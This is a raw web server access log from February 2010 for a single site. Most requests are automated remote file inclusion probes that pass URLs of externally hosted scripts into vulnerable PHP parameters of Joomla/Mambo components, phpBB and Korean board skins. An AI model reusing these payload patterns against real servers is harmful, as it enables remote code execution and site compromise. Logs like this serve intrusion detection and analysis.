218.38.243.44 - - [14/Feb/2010:06:42:49 -0800] "GET /logs/access_100210.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [14/Feb/2010:06:42:49 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [14/Feb/2010:06:43:11 -0800] "GET /logs/access_100121.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:06:43:41 -0800] "GET /logs/access_100129.log%20%20/myevent.php?myevent_path=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:06:43:41 -0800] "GET /myevent.php?myevent_path=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:06:43:41 -0800] "GET /logs/myevent.php?myevent_path=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:06:44:24 -0800] "GET /errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:06:44:24 -0800] "GET /logs/access_100112.log%20%20//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:06:44:24 -0800] "GET /logs//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:06:44:35 -0800] "GET /logs/access_100107.log%20%20//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:06:45:03 -0800] "GET /logs/access_100109.log%20%20/myevent.php?myevent_path=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.187 - - [14/Feb/2010:06:46:47 -0800] "GET /module/services.php HTTP/1.0" 200 3505 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
81.52.143.36 - - [14/Feb/2010:06:47:56 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)" "www.puaga.com"
81.52.143.36 - - [14/Feb/2010:06:47:58 -0800] "GET /logs/access.log HTTP/1.1" 200 202222 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)" "www.puaga.com"
205.205.227.101 - - [14/Feb/2010:06:49:07 -0800] "GET /logs/access_100117.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kenoby.net///class/fx29id2.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.205.227.101 - - [14/Feb/2010:06:49:07 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kenoby.net///class/fx29id2.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.205.227.101 - - [14/Feb/2010:06:49:08 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kenoby.net///class/fx29id2.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:06:50:06 -0800] "GET /logs/access.log%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:06:50:06 -0800] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:06:50:07 -0800] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:06:50:37 -0800] "GET /logs/access.log%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:06:50:38 -0800] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:06:50:39 -0800] "GET /logs/access_100127.log%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.67.235.148 - - [14/Feb/2010:06:52:23 -0800] "GET /logs/access_100202.log//delete_all.php?board_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
62.67.235.148 - - [14/Feb/2010:06:52:23 -0800] "GET /delete_all.php?board_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
62.67.235.148 - - [14/Feb/2010:06:52:23 -0800] "GET /logs//delete_all.php?board_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
62.67.235.148 - - [14/Feb/2010:06:52:27 -0800] "GET /logs/access_100202.log//delete_all.php?board_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
62.67.235.148 - - [14/Feb/2010:06:52:27 -0800] "GET /delete_all.php?board_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
62.67.235.148 - - [14/Feb/2010:06:52:28 -0800] "GET /logs//delete_all.php?board_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
121.254.172.27 - - [14/Feb/2010:06:54:10 -0800] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [14/Feb/2010:06:54:10 -0800] "GET /logs/access_100104.log%20%20/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [14/Feb/2010:06:54:10 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.235.132 - - [14/Feb/2010:06:54:25 -0800] "GET /logs//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.235.132 - - [14/Feb/2010:06:54:26 -0800] "GET /logs/access_100112.log%20%20//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.235.132 - - [14/Feb/2010:06:54:26 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.235.132 - - [14/Feb/2010:06:54:41 -0800] "GET /logs/access_100107.log%20%20//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [14/Feb/2010:06:56:19 -0800] "GET /logs/access_100103.log%20%20/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:06:57:18 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:06:57:18 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:06:57:18 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [14/Feb/2010:06:58:15 -0800] "GET /logs//index.php?pagina=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [14/Feb/2010:06:58:16 -0800] "GET /logs/access_100107.log//index.php?pagina=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [14/Feb/2010:06:58:16 -0800] "GET /index.php?pagina=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 200 3626 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:06:58:27 -0800] "GET /logs/access.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.186.64.181 - - [14/Feb/2010:06:58:48 -0800] "GET /logs/access_100205.log//index.php?pagina=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:06:59:20 -0800] "GET /logs/access_100112.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:06:59:27 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:06:59:27 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:06:59:27 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:06:59:44 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:06:59:44 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:06:59:44 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:59:56 -0800] "GET /logs/access_100109.log//index.php?option=com_custompages&cpage=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:59:56 -0800] "GET /logs//index.php?option=com_custompages&cpage=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:59:59 -0800] "GET /index.php?option=com_custompages&cpage=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:07:00:13 -0800] "GET /logs/access_100109.log%20%20//index.php?option=com_custompages&cpage=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:07:00:14 -0800] "GET /logs//index.php?option=com_custompages&cpage=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:07:00:14 -0800] "GET /index.php?option=com_custompages&cpage=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:07:00:41 -0800] "GET /errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:07:00:41 -0800] "GET /logs//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:07:00:42 -0800] "GET /logs/access_100112.log%20%20//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:07:00:52 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:07:00:52 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:07:00:52 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:07:00:55 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:07:00:55 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:07:00:55 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.169.166.90 - - [14/Feb/2010:07:00:59 -0800] "GET /!scan' HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
110.45.145.178 - - [14/Feb/2010:07:01:11 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [14/Feb/2010:07:01:12 -0800] "GET /logs/access_100109.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [14/Feb/2010:07:01:14 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:07:01:35 -0800] "GET /logs/access.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:07:02:37 -0800] "GET /logs/access.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:07:02:39 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:07:02:39 -0800] "GET /logs/access_100118.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:07:02:40 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:07:02:44 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:07:02:44 -0800] "GET /logs/access_100118.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:07:02:44 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:07:02:54 -0800] "GET /logs/access.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:07:02:55 -0800] "GET /logs/access.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:07:03:14 -0800] "GET /become_editor.php?theme_path=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:07:03:14 -0800] "GET /logs/access_100203.log/become_editor.php?theme_path=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:07:03:14 -0800] "GET /logs/become_editor.php?theme_path=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:07:03:20 -0800] "GET /logs/access_100118.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:07:03:20 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:07:03:20 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
211.169.166.90 - - [14/Feb/2010:07:03:21 -0800] "GET /!scan' HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:07:03:24 -0800] "GET /logs/access_100127.log/become_editor.php?theme_path=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.169.166.90 - - [14/Feb/2010:07:03:28 -0800] "GET /logs/access_100103.log/!scan' HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
211.169.166.90 - - [14/Feb/2010:07:03:29 -0800] "GET /!scan' HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
211.169.166.90 - - [14/Feb/2010:07:03:31 -0800] "GET /logs/!scan' HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:07:03:41 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:07:03:41 -0800] "GET /logs/access_100118.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:07:03:42 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [14/Feb/2010:07:04:36 -0800] "GET /logs/access_100130.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:05:01 -0800] "GET /logs/index.php?ort=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:05:01 -0800] "GET /logs/access_100109.log%20%20/index.php?ort=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:05:01 -0800] "GET /index.php?ort=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:07:05:07 -0800] "GET /logs/access_100114.log%20%20//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:07:05:07 -0800] "GET /logs/access_100112.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:07:05:07 -0800] "GET /ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:07:05:07 -0800] "GET /ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:07:05:07 -0800] "GET /logs//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:07:05:07 -0800] "GET /logs/access_100114.log%20%20//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:07:05:07 -0800] "GET /main.php?x=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:07:05:07 -0800] "GET /logs/access_100118.log/main.php?x=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:07:05:07 -0800] "GET /logs/access_100121.log/main.php?x=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:07:05:07 -0800] "GET /logs/main.php?x=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:07:05:07 -0800] "GET /logs//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:07:05:08 -0800] "GET /ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:07:05:08 -0800] "GET /logs//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:07:05:08 -0800] "GET /logs/access_100114.log%20%20//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:05:15 -0800] "GET /logs/access_100109.log%20%20/index.php?ort=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:05:16 -0800] "GET /logs/index.php?ort=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:05:16 -0800] "GET /index.php?ort=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:05:16 -0800] "GET /logs/access_100109.log%20%20/index.php?ort=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:05:16 -0800] "GET /logs/index.php?ort=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:05:16 -0800] "GET /index.php?ort=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:07:05:21 -0800] "GET /logs/access_100112.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:07:05:25 -0800] "GET /logs/access_100201.log%20%20//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
